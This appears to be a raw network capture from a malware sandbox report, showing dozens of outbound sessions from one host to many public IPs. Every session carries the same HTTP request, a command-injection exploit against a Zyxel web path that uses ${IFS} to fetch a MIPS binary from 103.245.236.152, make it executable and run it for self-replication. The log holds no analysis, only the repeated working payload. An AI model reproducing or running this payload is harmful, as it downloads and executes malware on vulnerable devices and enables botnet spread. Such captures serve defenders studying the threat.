                                            Jan 14, 2024 15:50:54.720361948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8526192.168.2.2341810138.206.70.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720419884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8527192.168.2.234040636.234.175.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720441103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8528192.168.2.234897846.20.180.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720493078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8529192.168.2.2358960211.197.156.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720542908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8530192.168.2.2351264122.112.96.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720598936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8531192.168.2.2337946114.142.28.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720626116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8532192.168.2.234572670.211.226.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720663071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8533192.168.2.235929212.63.253.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720700026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8534192.168.2.234556224.218.44.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720763922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8535192.168.2.2359308209.133.118.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720794916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8536192.168.2.2352636211.146.38.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720834970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8537192.168.2.2344564197.186.188.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720870972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8538192.168.2.2343736132.37.154.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720941067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8539192.168.2.2351120211.103.199.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720957041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8540192.168.2.2335654186.102.54.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.720999956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8541192.168.2.235863472.99.72.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721043110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8542192.168.2.2354856100.239.110.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721080065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8543192.168.2.2348978207.196.13.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721132040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8544192.168.2.23482304.111.192.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721162081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8545192.168.2.2353084209.153.65.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721218109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8546192.168.2.2342966170.154.184.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721249104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8547192.168.2.23390404.207.103.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721311092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8548192.168.2.233615813.199.102.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721349955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8549192.168.2.2346766216.211.169.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721381903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8550192.168.2.2348564160.255.226.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721435070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8551192.168.2.235444619.135.171.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721483946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8552192.168.2.2360702198.62.175.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721518993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8553192.168.2.235063870.240.138.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721544027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8554192.168.2.235911624.108.87.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721568108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8555192.168.2.234934296.152.97.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721600056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8556192.168.2.234019677.9.4.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721657038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8557192.168.2.2340616157.11.241.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721699953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8558192.168.2.2339096172.150.88.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721736908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8559192.168.2.2344416118.50.2.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721792936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8560192.168.2.235502043.133.113.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721824884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8561192.168.2.234226273.12.190.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721877098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8562192.168.2.235130627.171.167.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721939087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8563192.168.2.2352688153.36.98.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.721977949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8564192.168.2.2348094129.152.22.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.722027063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8565192.168.2.2358280110.219.144.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.722089052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8566192.168.2.2356616153.157.171.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.722110033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8567192.168.2.233368624.243.131.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.722183943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8568192.168.2.2336056104.129.32.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726193905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8569192.168.2.235953494.25.102.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726227999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8570192.168.2.235571496.136.194.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726788998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8571192.168.2.233880299.148.216.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726843119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8572192.168.2.234962288.160.41.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726897955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8573192.168.2.233607651.107.2.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726955891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8574192.168.2.2341000158.180.136.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.726974964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8575192.168.2.2337238165.22.219.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.727036953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8576192.168.2.2351506197.153.179.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737127066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8577192.168.2.234171837.119.32.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737181902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8578192.168.2.234882062.175.141.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737222910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8579192.168.2.2350750171.109.4.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737313032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8580192.168.2.2351680184.165.130.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737349033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8581192.168.2.2344304206.205.60.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737370968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8582192.168.2.234017882.86.80.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737421989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8583192.168.2.233301266.143.47.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737472057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8584192.168.2.234604673.0.60.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737494946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8585192.168.2.233604245.110.36.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737543106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8586192.168.2.2358992192.187.122.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737585068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8587192.168.2.234423034.212.160.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737623930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8588192.168.2.2337022123.108.100.6443
                                            TimestampBytes transferredDirectionData
